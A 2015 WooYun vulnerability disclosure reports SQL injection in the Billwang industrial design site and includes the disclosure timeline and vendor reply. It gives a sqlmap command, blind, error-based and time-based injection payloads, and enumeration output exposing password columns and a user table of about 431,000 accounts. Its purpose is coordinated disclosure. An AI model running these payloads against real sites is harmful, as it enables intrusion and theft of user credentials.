当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152062

漏洞标题:Billwang工业设计网某处存在SQL注射漏洞(43万名用户的密码邮箱qq等信息泄露)

相关厂商:Billwang工业设计网

漏洞作者: 路人甲

提交时间:2015-11-05 16:27

修复时间:2015-12-24 11:06

公开时间:2015-12-24 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-05: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

Billwang工业设计网(http://www.Billwang.net)是以工业设计为核心的创意设计行业互联网传播平台。网站目前拥有设计师会员35万余人,设计及产品制造类企业会员千余家。会员涵盖了大陆、台湾及国外相关院校的学生、教师、知名企业管理人员和工业设计从业人员。
Billwang工业设计网成立于2000年9月。经过近11年的发展,已经从最初的“设计论坛”发展成为国内设计行业用户在线最高的互动网络媒体之一。网站已建成资讯、博闻、招聘、作品四个专业频道,为设计师、设计企业及产品制造业提供专业化的信息传播、技术交流、资源分享及人才招聘等服务。
作为国内工业设计行业知名媒体传播平台,Billwang吸引了一批投身工业设计的业界精英、学者及专业的受众群体,同时也是中国工业设计协会和机械学会工业设计分会指定合作网站之一,并与国内知名设计企业和近40家高等设计类院校建立了紧密的合作关系。
我们致力打造服务于中国设计的创意设计电子商务平台,为设计院校师生、设计界从业人员和企业提供一个设计资源交流分享、设计活动信息发布推广,创意和设计成果展示、交易的互联网平台。

详细说明:

地址:http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059

python sqlmap.py -u "http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059" --random-agent -p userid --technique=BET --batch -D designbw -T bwduser -C username,password,qq,email --count


back-end DBMS: MySQL 5.0
Database: designbw
+---------+---------+
| Table   | Entries |
+---------+---------+
| bwduser | 431166  |
+---------+---------+

漏洞证明:

---
Parameter: userid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=viewpro&do=companyjobs&userid=4059 RLIKE (SELECT (CASE WHEN (2872=2872) THEN 4059 ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT 7191 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(7191=7191,1))),0x71786a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT * FROM (SELECT(SLEEP(5)))vLak)
---
web application technology: PHP 5.2.13
back-end DBMS: MySQL 5.0
current user:    'design@192.168.168.%'
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=viewpro&do=companyjobs&userid=4059 RLIKE (SELECT (CASE WHEN (2872=2872) THEN 4059 ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT 7191 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(7191=7191,1))),0x71786a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT * FROM (SELECT(SLEEP(5)))vLak)
---
web application technology: PHP 5.2.13
back-end DBMS: MySQL 5.0
database management system users [1]:
[*] 'design'@'192.168.168.%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=viewpro&do=companyjobs&userid=4059 RLIKE (SELECT (CASE WHEN (2872=2872) THEN 4059 ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT 7191 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(7191=7191,1))),0x71786a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT * FROM (SELECT(SLEEP(5)))vLak)
---
web application technology: PHP 5.2.13
back-end DBMS: MySQL 5.0
columns LIKE 'pass' were found in the following databases:
Database: designbw
Table: bwduser
[2 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| password     | char(32) |
| passworddate | date     |
+--------------+----------+
Database: designbw
Table: bwdforum
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: designbw
Table: bwdusergroup
[2 columns]
+-----------------+----------------------+
| Column          | Type                 |
+-----------------+----------------------+
| passwordexpires | smallint(5) unsigned |
| passwordhistory | smallint(5) unsigned |
+-----------------+----------------------+
Database: designbw
Table: bwdpasswordhistory
[2 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(50) |
| passworddate | date        |
+--------------+-------------+
Database: designbw
Table: bwdsession
[1 column]
+--------+------------+
| Column | Type       |
+--------+------------+
| bypass | tinyint(4) |
+--------+------------+
Database: wordpress
Table: wp_users
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| user_pass | varchar(64) |
+-----------+-------------+
Database: wordpress
Table: wp_posts
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| post_password | varchar(20) |
+---------------+-------------+
Database: new_shop
Table: cdb_uc_members
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: new_shop
Table: cdb_members
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: new_shop
Table: ecs_users
[3 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| passwd_answer   | varchar(255) |
| passwd_question | varchar(50)  |
| password        | varchar(32)  |
+-----------------+--------------+
Database: new_shop
Table: ecs_virtual_card
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| card_password | varchar(60) |
+---------------+-------------+
Database: new_shop
Table: cdb_forumfields
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: new_shop
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: new_shop
Table: uc_members
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: new_shop
Table: partner
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+


Database: designbw
Table: bwduser
[75 columns]
+------------------------------+-------------------------------------------------+
| Column                       | Type                                            |
+------------------------------+-------------------------------------------------+
| adminoptions                 | int(10) unsigned                                |
| aim                          | char(20)                                        |
| autosubscribe                | smallint(6)                                     |
| avatarid                     | smallint(6)                                     |
| avatarrevision               | int(10) unsigned                                |
| birthday                     | char(10)                                        |
| birthday_search              | date                                            |
| credit                       | int(10)                                         |
| customtitle                  | smallint(6)                                     |
| daysprune                    | smallint(6)                                     |
| displaygroupid               | smallint(5) unsigned                            |
| email                        | char(100)                                       |
| emailstamp                   | int(10) unsigned                                |
| forum_answers                | int(10) unsigned                                |
| friendcount                  | int(10) unsigned                                |
| friendreqcount               | int(10) unsigned                                |
| gmmoderatedcount             | int(10) unsigned                                |
| homepage                     | char(100)                                       |
| icq                          | char(20)                                        |
| infractiongroupid            | smallint(5) unsigned                            |
| infractiongroupids           | varchar(255)                                    |
| infractions                  | int(10) unsigned                                |
| ipaddress                    | char(15)                                        |
| ipoints                      | int(10) unsigned                                |
| joindate                     | int(10) unsigned                                |
| languageid                   | smallint(5) unsigned                            |
| lastactivity                 | int(10) unsigned                                |
| lastpost                     | int(10) unsigned                                |
| lastpostid                   | int(10) unsigned                                |
| lastvisit                    | int(10) unsigned                                |
| maxposts                     | smallint(6)                                     |
| membergroupids               | char(250)                                       |
| msn                          | char(100)                                       |
| ncode_imageresizer_maxheight | smallint(5) unsigned                            |
| ncode_imageresizer_maxwidth  | smallint(5) unsigned                            |
| ncode_imageresizer_mode      | enum('none','enlarge','samewindow','newwindow') |
| options                      | int(10) unsigned                                |
| parentemail                  | char(50)                                        |
| password                     | char(32)                                        |
| passworddate                 | date                                            |
| pcmoderatedcount             | int(10) unsigned                                |
| pcunreadcount                | int(10) unsigned                                |
| pmpopup                      | smallint(6)                                     |
| pmtotal                      | smallint(5) unsigned                            |
| pmunread                     | smallint(5) unsigned                            |
| post_thanks_thanked_posts    | int(10) unsigned                                |
| post_thanks_thanked_times    | int(10) unsigned                                |
| post_thanks_user_amount      | int(10) unsigned                                |
| posts                        | int(10) unsigned                                |
| profilepicrevision           | int(10) unsigned                                |
| profilevisits                | int(10) unsigned                                |
| qq                           | char(20)                                        |
| referrerid                   | int(10) unsigned                                |
| reputation                   | int(11)                                         |
| reputationlevelid            | int(10) unsigned                                |
| salt                         | char(3)                                         |
| showbirthday                 | smallint(5) unsigned                            |
| showvbcode                   | smallint(5) unsigned                            |
| sigpicrevision               | int(10) unsigned                                |
| skype                        | char(32)                                        |
| socgroupinvitecount          | int(10) unsigned                                |
| socgroupreqcount             | int(10) unsigned                                |
| startofweek                  | smallint(6)                                     |
| styleid                      | smallint(5) unsigned                            |
| threadedmode                 | smallint(5) unsigned                            |
| timezoneoffset               | char(4)                                         |
| usergroupid                  | smallint(5) unsigned                            |
| userid                       | int(10) unsigned                                |
| username                     | varchar(100)                                    |
| usertitle                    | char(250)                                       |
| utscore                      | int(11)                                         |
| vmmoderatedcount             | int(10) unsigned                                |
| vmunreadcount                | int(10) unsigned                                |
| warnings                     | int(10) unsigned                                |
| yahoo                        | char(32)                                        |
+------------------------------+-------------------------------------------------+


back-end DBMS: MySQL 5.0
Database: designbw
+---------+---------+
| Table   | Entries |
+---------+---------+
| bwduser | 431166  |
+---------+---------+


点到即止,不继续深入。

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-09 11:05

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评价